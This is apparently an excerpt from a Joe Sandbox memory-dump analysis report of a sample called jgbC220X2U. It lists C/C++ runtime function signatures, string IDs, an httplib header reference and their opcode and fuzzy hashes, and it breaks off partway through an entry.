                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy$wcslen
                • String ID: basic_string::append
                • API String ID: 1844840824-3811946249
                • Opcode ID: 9c7915bd4ca8250153b5df61b8ce792e31d979da48148e3bcb6b46548892fbcf
                • Instruction ID: 2eeae22fb4a86c25560fa64ae9943c990428fe8a37df41bd8ae07c83e6c198c3
                • Opcode Fuzzy Hash: 9c7915bd4ca8250153b5df61b8ce792e31d979da48148e3bcb6b46548892fbcf
                • Instruction Fuzzy Hash: 6C518362B08A5380FB20AB66DC401BDA362EB45F94BD48272DE1D473D5EF3CD542C760
                APIs
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF72A0AD23A), ref: 00007FF72A073630
                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF72A073700
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
                • API String ID: 3510742995-4063909124
                • Opcode ID: 6d406d1eca15f9b9f007d51335762189f405f530d7c79cdc67ffd738aba14ea4
                • Instruction ID: f2800c1a3a3fcb58f882f1c306a3283557501c91863144badb6451b9da698a9c
                • Opcode Fuzzy Hash: 6d406d1eca15f9b9f007d51335762189f405f530d7c79cdc67ffd738aba14ea4
                • Instruction Fuzzy Hash: CF51A3A2B08A8791FB30AF29DC505B8A750EB41F94FC482B2DE1D47791EE3DD542CB21
                APIs
                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF729FB152D), ref: 00007FF729FD2BE9
                • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,00007FF729FB152D), ref: 00007FF729FD2C0A
                • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,?,?,00007FF729FB152D), ref: 00007FF729FD2C96
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcmp$strlen
                • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
                • API String ID: 3738950036-1697194757
                • Opcode ID: 6a0a4d276924c77aacee2f4d304ff23adc5e3a689598d2db9c6d11ed37480923
                • Instruction ID: 6a7c213638a0a1e39fd1b0f23796ef5bbb6e63927ee73005116b3238c7f8edfa
                • Opcode Fuzzy Hash: 6a0a4d276924c77aacee2f4d304ff23adc5e3a689598d2db9c6d11ed37480923
                • Instruction Fuzzy Hash: 592105A2F0998741FF64BF26AD006E59250DF15BF0E9C4231EE2C4B7D1ED1CEB869620
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: setlocale$memcpystrlen
                • String ID:
                • API String ID: 4096897932-0
                • Opcode ID: e445fc0b44ec2ffa3fdcd92ed46016b8cf808a53da8db7d5860cf8180c6e5591
                • Instruction ID: dc29e12d2adc25e39968a9a97141b6abfdb409139aa7824f6faa0abe69579237
                • Opcode Fuzzy Hash: e445fc0b44ec2ffa3fdcd92ed46016b8cf808a53da8db7d5860cf8180c6e5591
                • Instruction Fuzzy Hash: 9D11D082B0828244FA60BF666C046FAD656AB86BD4FC84036EE0C4B386DD3CD7459B20
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: setlocale$memcpystrlen
                • String ID:
                • API String ID: 4096897932-0
                • Opcode ID: f01e851db0a52cbc10af4f68602d2f5a03049bdd4ad9841078bbb22f159cd59a
                • Instruction ID: d8057dc9f10f5d16cec2748f900b8090b88974580956cf51f1b1a183a10bf46c
                • Opcode Fuzzy Hash: f01e851db0a52cbc10af4f68602d2f5a03049bdd4ad9841078bbb22f159cd59a
                • Instruction Fuzzy Hash: BF01F752B0815200FAA8FE673D059BEC261AF4AFD4FC88035ED0D9B786DC3CD2425724
                APIs
                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FBADC7), ref: 00007FF72A033B40
                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FBADC7), ref: 00007FF72A033B44
                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FBADC7), ref: 00007FF72A033B58
                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FBADC7), ref: 00007FF72A033B70
                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF729FBADC7), ref: 00007FF72A033B77
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: _errno
                • String ID:
                • API String ID: 2918714741-0
                • Opcode ID: e6fb373ae49db40d69894a36c95eaa56178bddb1cabda2af5240b95fbc3f345f
                • Instruction ID: 8ca3e53090e5e236778707231dfd6bfb6d8d9bdd6b0ae22395870b7233f80a48
                • Opcode Fuzzy Hash: e6fb373ae49db40d69894a36c95eaa56178bddb1cabda2af5240b95fbc3f345f
                • Instruction Fuzzy Hash: 38F03172A0921985F7163F26AE40369B694EF94BD5F898071CF0C07390EA3C68828A21
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_set_new_mode
                • String ID:
                • API String ID: 556796188-0
                • Opcode ID: 0f5a7bc6cd6fd49efd1ab2f69c8439aaa4216d37fa67d7a71c11ded4c304a7e8
                • Instruction ID: 6a906cbc9d5f6132110930905a2a19b5db2b1ac9304bb1f43a409a3b953e96a2
                • Opcode Fuzzy Hash: 0f5a7bc6cd6fd49efd1ab2f69c8439aaa4216d37fa67d7a71c11ded4c304a7e8
                • Instruction Fuzzy Hash: EC015276A04B05CAF754AF28D8817AC73B4EB44788F884530F60D47795CF3CD6909B50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: __p___argc__p___wargv__p__wenviron_configure_wide_argv_set_new_mode
                • String ID:
                • API String ID: 3305919566-0
                • Opcode ID: 0f23cf09409b0d26907cff3e3a4d107db834581702d7b47b91b6b6aeeaa67cf6
                • Instruction ID: a02b65f4e00bf14472edc53a3c9cd9177332e43e1d9ac53ca16ca5f8b596d4f8
                • Opcode Fuzzy Hash: 0f23cf09409b0d26907cff3e3a4d107db834581702d7b47b91b6b6aeeaa67cf6
                • Instruction Fuzzy Hash: 37015276A04B05CAF754AF35D8817AD3374EB44788F984430E60D47796CF3CD6909B60
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: basic_filebuf::xsgetn error reading the file
                • API String ID: 0-3108371566
                • Opcode ID: b4a426ca3b8d3586c9d96a05829d1f1e4f268fb7c0d2b9785b49ea1444ce75b8
                • Instruction ID: e58ce5fc2e38bfee87de4021518f47125dfa825581f578cce44d557c72388fbd
                • Opcode Fuzzy Hash: b4a426ca3b8d3586c9d96a05829d1f1e4f268fb7c0d2b9785b49ea1444ce75b8
                • Instruction Fuzzy Hash: 1FB1D252F15B8685FB20AF368A043B9A3A1FB55BC8F988271DE4C47795FE38E485C710
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memset
                • String ID: &
                • API String ID: 2221118986-1010288
                • Opcode ID: d6a1800a9c41c2214061d5202ed132b94195d53c145a58f32f9d483b25d032c0
                • Instruction ID: 8fa03d8a952c10c13a1b8bd4bcc3c31446d41d48f7ac59c62f5b7211027698ba
                • Opcode Fuzzy Hash: d6a1800a9c41c2214061d5202ed132b94195d53c145a58f32f9d483b25d032c0
                • Instruction Fuzzy Hash: 2E811732A04B15C9EB90AF65C8453AC77B0FB0478CF546826EA0D57B98CFBCD690D7A0
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memset
                • String ID: &
                • API String ID: 2221118986-1010288
                • Opcode ID: 8d1044b10714d39de10765ba2e0a7f343f060cdfa0c7677546f5d0797fd30f53
                • Instruction ID: 97f5f35da8b9613e19315d850cc3cbfcdd656bc37c49174e680b270bf6cb94a7
                • Opcode Fuzzy Hash: 8d1044b10714d39de10765ba2e0a7f343f060cdfa0c7677546f5d0797fd30f53
                • Instruction Fuzzy Hash: 65813736A04B51CDEB90DF65C8443AC77B0E704798F985835EA0D57B88CFB9D690DBA0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: CCG
                • API String ID: 0-1584390748
                • Opcode ID: 85cb6ebe368a2b02ee6037d12130406530b4ac35202a65e0c0dba2d3a4243ef3
                • Instruction ID: 4c8ead9ade2457195500edad2aecfd1dd5e17d8a7d47c569356070c1a1be19d4
                • Opcode Fuzzy Hash: 85cb6ebe368a2b02ee6037d12130406530b4ac35202a65e0c0dba2d3a4243ef3
                • Instruction Fuzzy Hash: B5413672A09A0289F7E0BF68CC4437DA670FB05358F984635DA3D977E4CE3CD641AA61
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: FormatFreeLocalMessage
                • String ID: basic_string: construction from null is not valid
                • API String ID: 1427518018-2991274800
                • Opcode ID: 7c8ed238070af8e952e933038b646a8e94088f575eb2f45ce9c6900c748957ae
                • Instruction ID: 69e3c048d1c903d9243414aac8101d4d9daa09f2bd44b699b5e90932e8292fb8
                • Opcode Fuzzy Hash: 7c8ed238070af8e952e933038b646a8e94088f575eb2f45ce9c6900c748957ae
                • Instruction Fuzzy Hash: 2C218122A08A5691FB65BF15BC103ADE2A4EF49B90F884131DE4D07795EF3CE64A9B10
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: memcpy
                • String ID:
                • API String ID: 3510742995-0
                • Opcode ID: e1cc777bf74217377d89102dbe6bdca6a76bc7c4895d87721c3079de84ea9faa
                • Instruction ID: 0ad943dd3f9bb142486b74f0932ec6fe68dcd331d2ae73b369b6c4a43fc29e75
                • Opcode Fuzzy Hash: e1cc777bf74217377d89102dbe6bdca6a76bc7c4895d87721c3079de84ea9faa
                • Instruction Fuzzy Hash: D9818372A04B82C5E7249F25CD4067DB3A1FB04BD8B948636EE6C57788EF38E951C760
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID: freememcpystrlen
                • String ID:
                • API String ID: 2208669145-0
                • Opcode ID: d5873acf88164a1d6e7441cc3ba126a0484ba67d53d2e1bf56d3f9fe83fa97c4
                • Instruction ID: afdcd73f37c7ec296f3bac1537768e6b55d64e96d0710c913f5a63d25097ad86
                • Opcode Fuzzy Hash: d5873acf88164a1d6e7441cc3ba126a0484ba67d53d2e1bf56d3f9fe83fa97c4
                • Instruction Fuzzy Hash: 6F31D622A09A4349FAE27E119E00379D271FF807E5F9C8234DF5D26FD5DE2CE641AA10
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd
                Similarity
                • API ID:
                • String ID: /mingw/include/httplib.h$chunk_len == 0
                • API String ID: 0-3103630078
                • Opcode ID: abf1582ff57daed98610bb0b36bbbdaa856649f54cab3f1e7d76a1d821e5dc40
                • Instruction ID: 5e42c4f89547e4bb81d4d38ad8e06ff0981fde504e77c16668dcb26795816e99
                • Opcode Fuzzy Hash: abf1582ff57daed98610bb0b36bbbdaa856649f54cab3f1e7d76a1d821e5dc40
                • Instruction Fuzzy Hash: 05716C21F0970298FF90EE6199543E9A371EB19788F9800B5DD0D17796EE2CD744AB20
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true
                • Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
